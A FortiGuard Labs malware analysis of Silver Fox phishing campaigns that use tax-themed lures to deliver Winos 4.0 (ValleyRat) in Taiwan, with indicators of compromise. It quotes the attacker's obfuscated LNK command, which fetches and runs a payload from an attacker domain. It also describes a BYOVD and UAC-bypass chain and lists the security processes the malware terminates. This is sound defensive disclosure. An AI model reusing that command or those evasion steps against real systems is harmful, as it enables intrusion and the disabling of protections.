Article ContentsAffected Platforms: Microsoft Windows
Impacted Users: Microsoft Windows
Impact: Widespread file encryption. Stolen data may be leveraged for follow-on attacks
Severity Level: High
FortiGuard Labs recently observed several targeted phishing campaigns in Taiwan that use themes designed to exploit local business processes. These campaigns disseminate Winos 4.0 (ValleyRat) and subsequent malicious plugins through weaponized attachments or embedded links. The lures mimic official communications, such as tax audit notifications, tax filing software installers, and cloud-based e-invoice downloads.
Our analysis of domain registration data reveals that attackers use a rotating set of domains and cloud services to host and distribute malware. The highly volatile nature of this infrastructure renders traditional, static domain blocking insufficient as a primary defense. Over the past two months, we have identified various delivery techniques, including malicious LNK files used for a downloader, DLL sideloading via legitimate executables to load shellcode, and BYOVD (Bring Your Own Vulnerable Driver) attacks using "wsftprm.sys.” The following sections provide technical details and the associated activities of Silver Fox.
The first campaign leverages a tax-themed lure to deceive users into executing a multi-stage infection chain. The attack begins with a RAR archive named “taxIs_RX3001.rar,” which contains a benign decoy document and a malicious LNK file.
The LNK file utilizes a relative path to invoke the system command processor: ..\..\..\..\Windows\System32\cmd.exe. By calling cmd.exe, the attacker executes a series of obfuscated commands designed to download the next-stage payload while evading detection:
Arguments:
/C md %public%\501 & %windir%\Sysnative\DeviceCredentialDeployment.exe & %windir%\System32\DeviceCredentialDeployment.exe & Copy /Y %windir%\System32\c^u^rl.e^x^e %public%\501\url.exe & %public%\501\ur^l.e^x^e -o %public%\501\Se^tup^64.exe h^tt^p^s:/^/bq^dr^zbyq.cn/Set^up^64.e^x^e & %public%\501\Setup64.exe
This script first creates a working directory at %public%\501. It then performs system binary masquerading by copying the legitimate system utility curl.exe to this new directory and renaming it to url.exe to bypass simple filename-based monitoring. The renamed file was then used to download an executable named Setup64.exe from the remote domain bqdrzbyq[.]cn. During this process, the script also triggers DeviceCredentialDeployment.exe to maintain the appearance of normal system activity.
Once the downloaded installer “64位安装包_特別版” is executed, it extracts resources by locating an embedded executable in the resource section named “EXPAND.” This embedded payload is extracted and written to the local path C:\ProgramData\Golden. This stage serves as the foundation for the later deployment of Winos 4.0 (ValleyRat) and the loading of the driver for defensive evasion.
We will go through the entire execution of Winos 4.0 in a later section.
The second campaign involves distributing various forged Ministry of Finance documents via phishing emails. One technique leverages the URL hxxp://taxfnat[.]tw/ to impersonate an official Taiwanese domain, while actually redirecting victims to a cloud service on the mainland at hxxps://twmoi2002.tos-cn-shanghai.volces[.]com/E-Invoice.rar to download a compressed archive.
Another variation is to send the e-invoice via email. It displays the link as hxxps://www.einvoice. nat.gov[.]tw/, though it actually connects to hxxps://njhwuyklw[.]com/ that leads to the cloud download path hxxps://sdfw2026024.tos-cn-shanghai.volces[.]com/E-Invoice.rar.
In the past two months, the downloaded archives have shifted strategy, moving away from using shortcut files (LNK) as intermediate downloaders, which would otherwise result in a single malicious execution file. Instead, the attacker delivers an archive containing a DLL that is sideloaded through a legitimate application. This campaign uses the same method for loading the malicious driver as the first wave and connects to the same C2 address.
In this campaign, the PDB path within the malicious DLL is C:\Users\Administrator\Desktop\大馬專案(二)\x64\Release\DLL.pdb. This distinct project name, "大馬專案(二)," suggests that the Silver Fox group has organized its operations into projects with specific names. Through this string, we tracked another operation utilizing a legitimate file named 綜合所得稅電子結算申報繳稅.exe for DLL sideloading, though the C2 infrastructure for that campaign has migrated to 154[.]91.64.246. These observations indicate that the attack campaign is likely to continue evolving.
Before initiating its core functions, it calls RunUAC() to ensure it is operating within a high-integrity environment. This process begins with a dynamic privilege check using CheckAdminPrivileges. If the process already possesses administrative rights, it bypasses further escalation to minimize system noise. Otherwise, it calls BypassUACViaDebugObject, a technique that combines RPC AppInfo service calls with Debug Object Hijacking. By leveraging whitelisted system binaries, computerdefaults.exe can elevate its thread to administrator level without triggering a UAC prompt.
Its data fields contain numerous Base64-encoded strings used to load drivers and target security software. The core driver involved is wsftprm.sys (File Description: Topaz OFD - PM), a 64-bit, validity-signed Windows kernel-mode driver (version 2.0.0.0). To load this driver, the malware performs a Bring Your Own Vulnerable Driver (BYOVD) attack by dynamically obtaining Native APIs from ntdll.dll, such as RtlInitUnicodeString, NtLoadDriver, and RtlAdjustPrivilege, which allow it to bypass standard service monitoring.
It also queries registry values for VulnerableDriverBlocklistEnable under SYSTEM\CurrentControlSet\Control\CI\Config and the backup path ControlSet001. Depending on the system's defense state, it dynamically adjusts its registry loading paths. In these steps, we also found that error messages are encoded in Simplified Chinese (GBK).
Once kernel privileges are obtained through wsftprm.sys, the malware enters a monitoring loop to cross-reference active processes against a hardcoded list of security products. The target list includes: ZhuDongFangYu.exe, 360tray.exe, 360sd.exe, HipsDaemon.exe, HipsMain.exe, HipsTray.exe, wsctrlsvc.exe, SecurityHealthHost.exe, SecurityHealthService.exe, SecurityHealthSystray.exe, MpDefenderCoreService.exe, 2345SoftmgrSvc.exe, 2345SoftmgrDaemon.exe, 2345SoftMgr.exe, MSPCManager.exe, MSPCManagerService.exe, smartscreen.exe, MsMpEng.exe, NisSrv.exe, wsc_proxy.exe, wsccommunicator.exe, AvastSvc.exe, bdservicehost.exe, AVGSvc.exe, 360rps.exe, 360rp.exe, qmbsrv.exe, QQPCTray.exe, QQPCRTP.exe, uiWinMgr.exe, uiSeAgnt.exe, PtSessionAgent.exe, PtWatchDog.exe, PtSvcHost.exe, AMSPTelemetryService.exe, unsecapp.exe, uiWatchDog.exe, coreFrameworkHost.exe, coreServiceShell.exe, TmsaInstance64.exe, and ConfigSecurityPolicy.exe.
This list covers a wide range of protection tools, including Microsoft Defender, Trend Micro, Symantec, and security suites such as HuoRong and 360. Terminating these processes achieves a clean environment for Winos 4.0 to persist, escalate privileges, and maintain remote control without interference.
Winos 4.0 hides its C2 address, 47[.]76 [.]86 [.]151, using Base64 encoding (TkRjdU56WXVPRFl1TVRVeA==). After verifying the system version, it connects to its C2 to load the core component, 上线模块.dll (online module).
It then downloads other plugins and 登录模块 (login module), and stores them directly in the registry, allowing them to be loaded into memory without writing physical files to disk. The specific plugins identified in this campaign include: 文件管理, 高速屏幕, 娱乐屏幕, 差异屏幕,and 系统管理. All plugins support file management, screen capture, remote control, and system management.
Based on similar file path patterns, we identified a related archive hosted at hxxps://twtaxgo[.]cn/uploads/20260129/taxIs_RX3001.7z. Our tracking confirms that campaigns dating back to January 2026 utilize the same C2, 47[.]76[.]86[.]151. Further analysis of domain registration data revealed a consistent registrant name, "李积强," and an associated email address, gongluliu@zju.edu[.]cn, which also appeared in the text file from the first campaign. Also, the LNK metadata contains the MachineID “desktop-t3n3m3q.” This specific ID was observed in Silver Fox APT activity in August 2025, during an environmental check routine. This strongly suggests that the identifier belongs to systems used by the attackers during malware development. Given the identical driver-abuse techniques and overlapping infrastructure, we assess with high confidence that these campaigns are the work of the same specialized subgroup within Silver Fox.
Since last year, FortiGuard Labs has exposed multiple operations involving Winos 4.0 (ValleyRat), revealing a persistent threat actor specifically targeting organizations across Asia. This group demonstrates a high level of sophistication in designing localized phishing lures, often registering domains that appear to be related to country-specific text to enhance the perceived legitimacy of their tax-themed and official document decoys.
The technical evolution of this group is evident in their shift toward memory-resident execution for additional plugins, leaving minimal physical footprints on the local disk. The exposure of internal project names, such as 大馬專案, alongside consistent development machine identifiers, indicates a well-organized operation with a mature toolset and structured planning. As this threat actor continues to refine its evasion techniques and infrastructure, users and organizations must remain highly vigilant. It is critical to treat any documents or links from non-trusted sources with extreme caution to prevent infection by this evolving threat.
The malware described in this report is detected and blocked by FortiGuard Antivirus as:
W64/Agent.ATW!tr
The FortiGuard AntiVirus service engine is integrated into FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running these products with up-to-date signatures are protected against the malware components described in this report.
FortiMail detects the initial phishing emails as virus detected. In addition, real-time anti-phishing protection provided by FortiSandbox, embedded across Fortinet’s FortiMail, web filtering, and antivirus solutions, enables advanced detection of both known and unknown phishing attempts. The FortiPhish phishing simulation service further supports user resilience by actively training and testing end users against real-world phishing techniques, including impersonation, Business Email Compromise (BEC), and ransomware delivery.
The FortiGuard CDR (Content Disarm and Reconstruction) service, available on both FortiGate and FortiMail, can neutralize malicious content embedded in documents by removing active code while preserving document usability.
The FortiGuard IP Reputation and Anti-Botnet Security Service proactively blocks infrastructure associated with this campaign by correlating malicious IP intelligence collected from Fortinet’s global sensor network, CERT collaborations, MITRE, trusted industry partners, and other intelligence sources.
Organizations seeking to strengthen foundational security awareness may also consider completing Fortinet Certified Fundamentals (FCF) training in Cybersecurity.
If you believe this or any other cybersecurity threat has impacted your organization, contact our Global FortiGuard Incident Response Team for assistance.
bqdrzbyq[.]cn
taxfnat[.]tw
njhwuyklw[.]com
twtaxgo[.]cn
taxhub[.]tw
taukeny[.]com
taxpro[.]tw
lmaxjuyh[.]cn
tkooyvff[.]cn
etaxtw[.]cn
twswsb[.]cn
47[.]76[.]86[.]151
hxxps://twmoi2002.tos-cn-shanghai.volces[.]com/E-Invoice.rar
hxxps://sdfw2026024.tos-cn-shanghai.volces[.]com/E-Invoice.rar
hxxps://twtaxgo[.]cn/uploads/20260129/taxIs_RX3001.7z
64ee7a2e6259286311c8ba1c7b6d30e1e52fe78befcfd1b71b291c788f3e3e6a Setup.exe
156f31b37ee0d6e7f87cdc94dcd2d3b084b2e15da08bd8588e17d6bdc43159fe AISafeSDK64.dll
